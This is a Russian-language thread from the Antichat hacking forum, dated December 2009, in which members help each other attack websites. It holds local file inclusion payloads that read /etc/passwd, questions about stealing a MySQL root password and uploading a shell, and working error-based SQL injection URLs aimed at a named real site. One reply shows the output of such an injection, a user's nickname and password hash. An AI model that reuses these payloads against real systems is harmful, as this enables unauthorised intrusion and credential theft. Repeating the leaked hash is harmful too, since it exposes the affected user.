Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
09.12.2009, 22:47
|
|
Новичок
Регистрация: 22.10.2009
Сообщений: 3
Провел на форуме:
101899
Репутация:
1
|
|
Root-access, я так понял это ответ на первый вопрос?
Если вы внимательно посмотрите там происходит контактация.
Используя ваш пример на выходе получается :
include('page../../../../../../../etc/passwd%00.php');
что естественно вызовет ошибку. Т.к фаил page../../../../../../../etc/passwd не существует
Последний раз редактировалось eliteload; 09.12.2009 в 22:50..
|
|
|
10.12.2009, 03:39
|
|
Новичок
Регистрация: 28.10.2006
Сообщений: 23
Провел на форуме:
125281
Репутация:
1
|
|
Здравствуйте.
В общем есть сервачек игровой один, на его сайте вкручена система голосования. Вкручена она таким образом...
Пройдя по ссылке:
_xттп://_host_/vote/voting.php
Вы попадаете на страничку голосования , нечего особого эта страничка не представляет, формочка куда надо вписать логин и пара кнопок.
Внутри этой странички встроен JScript:
PHP код:
...
<script language="javascript" type="text/javascript">
function game(){
log=document.forms["form1"].login.value;
window.open('http://_host_/vote/game.php?login='+log);
window.open('http://сайт_сюда_перекидывает');
}
<script>
...
<form name="form1">
<input type="text" name="login">
<input type="hidden" id="vid" name="id">
...
<input type="button" value="Проголосовать" onclick="game()">
...
значит после того как вы вписываете логин и тискаете кнопку "проголосовать", у вас открывается две страницы, одна из которых (_хттп://_host_/vote/game.php?login=логин) содержит содержит сообщение о том, что вам была вставлена кука и проголосовать повторно вы не сможете в течении "X" времени.
Кука выглядит вот так:
PHP код:
vote gday: 10
vote gh:00
vote gm:55
vote gmount: 12
Если исправить значения куки, допустим значение "vote gday" изменить с "10" на "фывфы" или на " ' " и перегрузить (_хттп://_host_/vote/game.php?login= Логин)
то выдает страницу с следующим текстом:
Warning: mktime() expects parameter 5 to be long, string given in /var/www/_host_/vote/game.php on line 23
Warning: Cannot modify header information - headers already sent by (output started at /var/www/_host_/vote/game.php:23) in /var/www/_host_/vote/game.php on line 27
Warning: Cannot modify header information - headers already sent by (output started at /var/www/_host_/vote/game.php:23) in /var/www/_host_/vote/game.php on line 28
Warning: Cannot modify header information - headers already sent by (output started at /var/www/_host_/vote/game.php:23) in /var/www/_host_/vote/game.php on line 29
Warning: Cannot modify header information - headers already sent by (output started at /var/www/_host_/vote/game.php:23) in /var/www/_host_/vote/game.php on line 30
Логин , спасибо за ваш голос ...
Если же перегрузить страницу без указания конкретного значения Login (_хттп://_host_/vote/game.php?login= ), то выдает страницу с таким тестом:
Warning: mktime() expects parameter 5 to be long, string given in /var/www/_host_/vote/game.php on line 23
Warning: Cannot modify header information - headers already sent by (output started at /var/www/_host_/vote/game.php:23) in /var/www/_host_/vote/game.php on line 27
Warning: Cannot modify header information - headers already sent by (output started at /var/www/_host_/vote/game.php:23) in /var/www/_host_/vote/game.php on line 28
Warning: Cannot modify header information - headers already sent by (output started at /var/www/_host_/vote/game.php:23) in /var/www/_host_/vote/game.php on line 29
Warning: Cannot modify header information - headers already sent by (output started at /var/www/_host_/vote/game.php:23) in /var/www/_host_/vote/game.php on line 30
, спасибо за ваш голос ...
Warning: mysql_result() [function.mysql-result]: Unable to jump to row 0 on MySQL result index 2 in /var/www/_host_/vote/script.php on line 8
изменяя значения (gday,gh,gm,gmount):
PHP код:
vote gday: 10
vote gh:00
vote gm:55
vote gmount: 12
в результате страница ничем почти не изменяется, кроме первой записи:
Warning: mktime() expects parameter ->5 (1,2,3)<- to be long, string given in /var/www/_host_/vote/game.php on line 23
насколько я понимаю значения кук попадает в функцию mktime() в виде параметров, функция не может воспринять передаваемые параметры и выдает ошибку.
Терь вопрос является ли эта вся штука уязвимостью и как эту уязвимость можно использывать, имеетли место sql-inj и можно ли как нибудь достать расс рута mysql? Можно ли как нить залить шелл?
Пробовал через телнет конектится к серваку на 3306, оказалось что открыт удаленный доступ к MySQL.
Насколько мне известно на серваке (Unix,little-endian). |
|
|
|
10.12.2009, 03:45
|
|
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281
Репутация:
1177
|
|
nightmare007, в куке хранится время, она не фильтруется, из-за этого ошибка. Скуля там врят ли, максимум XSS.
|
|
|
|
10.12.2009, 10:22
|
|
Познающий
Регистрация: 09.04.2008
Сообщений: 79
Провел на форуме:
463189
Репутация:
124
|
|
Ребят, помогите докрутить:
Код:
http://www.fnatic.com/popups/tagwall/tagwall.php?id=57679'
С кавычкой ошибка есть, но количество полей не подобрать, а без кавычки вообще ноль реакции на что-либо. Есть подозрение, что она слепая. |
|
|
|
10.12.2009, 11:44
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
Можно крутить и как слепую. Там многострочный запрос
|
|
|
|
10.12.2009, 11:49
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
Провел на форуме:
14324684
Репутация:
3908
|
|
Сообщение от keng
Ребят, помогите докрутить:
Код:
http://www.fnatic.com/popups/tagwall/tagwall.php?id=57679'
С кавычкой ошибка есть, но количество полей не подобрать, а без кавычки вообще ноль реакции на что-либо. Есть подозрение, что она слепая.
Код:
http://www.fnatic.com/popups/tagwall/tagwall.php?id=57679'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((version()),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((version()),14)e)b)a)/**/and/**/'1'='1
Duplicate column name ' 5.0.51a-24+lenny2'
Код:
http://www.fnatic.com/popups/tagwall/tagwall.php?id=57679'/**/and/**/1=(SELECT/**/*/**/FROM(SELECT/**/*/**/FROM(SELECT/**/NAME_CONST((select+concat_ws(0x3a,nickname,password)+from+users+limit+1),14)d)/**/as/**/t/**/JOIN/**/(SELECT/**/NAME_CONST((select+concat_ws(0x3a,nickname,password)+from+users+limit+1),14)e)b)a)/**/and/**/'1'='1
Duplicate column name ' snakeye:2a63eca1020db4020c46be9b5dc8de4467d00912'
__________________
Feci, quod potui. Faciant meliora potentes.
Последний раз редактировалось Ded MustD!e; 10.12.2009 в 11:54..
|
|
|
|
10.12.2009, 12:46
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Сообщение от eliteload
Root-access, я так понял это ответ на первый вопрос?
Если вы внимательно посмотрите там происходит контактация.
Используя ваш пример на выходе получается :
include('page../../../../../../../etc/passwd%00.php');
что естественно вызовет ошибку. Т.к фаил page../../../../../../../etc/passwd не существует
Ну так можно ж еще слеш добавить в начале:
?lfi=/../../../../../../../etc/passwd%00
Iceangel_: разве это изменит ситуацию?
Последний раз редактировалось Iceangel_; 10.12.2009 в 14:26..
|
|
|
|
10.12.2009, 14:24
|
|
Members of Antichat - Level 5
Регистрация: 09.07.2006
Сообщений: 553
Провел на форуме:
7561206
Репутация:
1861
|
|
Сообщение от eliteload
Если вы внимательно посмотрите там происходит контактация.
Используя ваш пример на выходе получается :
include('page../../../../../../../etc/passwd%00.php');
что естественно вызовет ошибку. Т.к фаил page../../../../../../../etc/passwd не существует
В Windows это не проблема, в пути вполне могут находится несуществующие папки. А вот в Linux такое непозволительно, выходом из сложившейся ситуации может быть подобная конструкция:
Код:
include('page1.php/../../../../../../../etc/passwd%00.php');
При условии что файл page1.php существует, файл /etc/passwd будет проинклужен.
|
|
|
|
10.12.2009, 14:37
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Сообщение от Iceangel_
В Windows это не проблема, в пути вполне могут находится несуществующие папки. А вот в Linux такое непозволительно, выходом из сложившейся ситуации может быть подобная конструкция:
Код:
include('page1.php/../../../../../../../etc/passwd%00.php');
При условии что файл page1.php существует, файл /etc/passwd будет проинклужен.
Я на всякий случай проверил код - на gentoo linux сработало как с добавлением слеша, так и вообще без него, т.е. ?lfi=../../../../../../../../etc/passwd работает.
|
|
|
|
10.12.2009, 17:03
|
|
Новичок
Регистрация: 10.12.2009
Сообщений: 2
Провел на форуме:
2846
Репутация:
0
|
|
Как взломать комп по LAN.
P.S. Спрашиваю чисто в учебных целях)))
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
